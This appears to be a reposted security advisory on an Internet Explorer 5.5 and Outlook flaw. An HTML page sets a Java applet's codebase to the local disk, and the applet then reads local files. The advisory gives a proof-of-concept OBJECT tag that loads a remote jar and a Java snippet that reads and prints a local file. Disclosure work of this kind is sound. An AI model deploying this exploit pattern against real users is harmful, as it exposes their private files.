COMMAND
Internet Explorer
SYSTEMS AFFECTED
IE 5.5/Outlook/Outlook Express
PROBLEM
Following is based on a Georgi Guninski security advisory #24.
There is a security vulnerability in IE 5.5/Outlook/Outlook
Express which allows reading local files, arbitrary URLs and
local directory structure after viewing a web page or reading
HTML message.
The problem is the possibility for specifying arbitrary codebase
for an applet loaded from <OBJECT> tag and a jar file. Applets
may read URLs from their codebase and communicate with hosts from
the codebase. The following code:
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
sets the applet's codebase to file:///c:/
This is not Java language problem and we suppose not a problem in
Microsoft's VM but a problem in the way codebase is set by IE.
The code is:
---------javacodebase1.html------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
---------------------------------------------------------------------
--------gjavacodebase.java-------------------------------------------
......
try
{
u = new URL(getParameter("URL"));
InputStream is=u.openStream();
byte ba[]=new byte[1000];
int l=is.read(ba);
InputStream os=u.openConnection().getInputStream();
String s1=new String(ba,0,l);
print(u.toString());
print(s1);
}
.......
Demonstration is available at:
http://www.guninski.com/javacodebase1.html
SOLUTION
Disable Java. MS is working on a patch.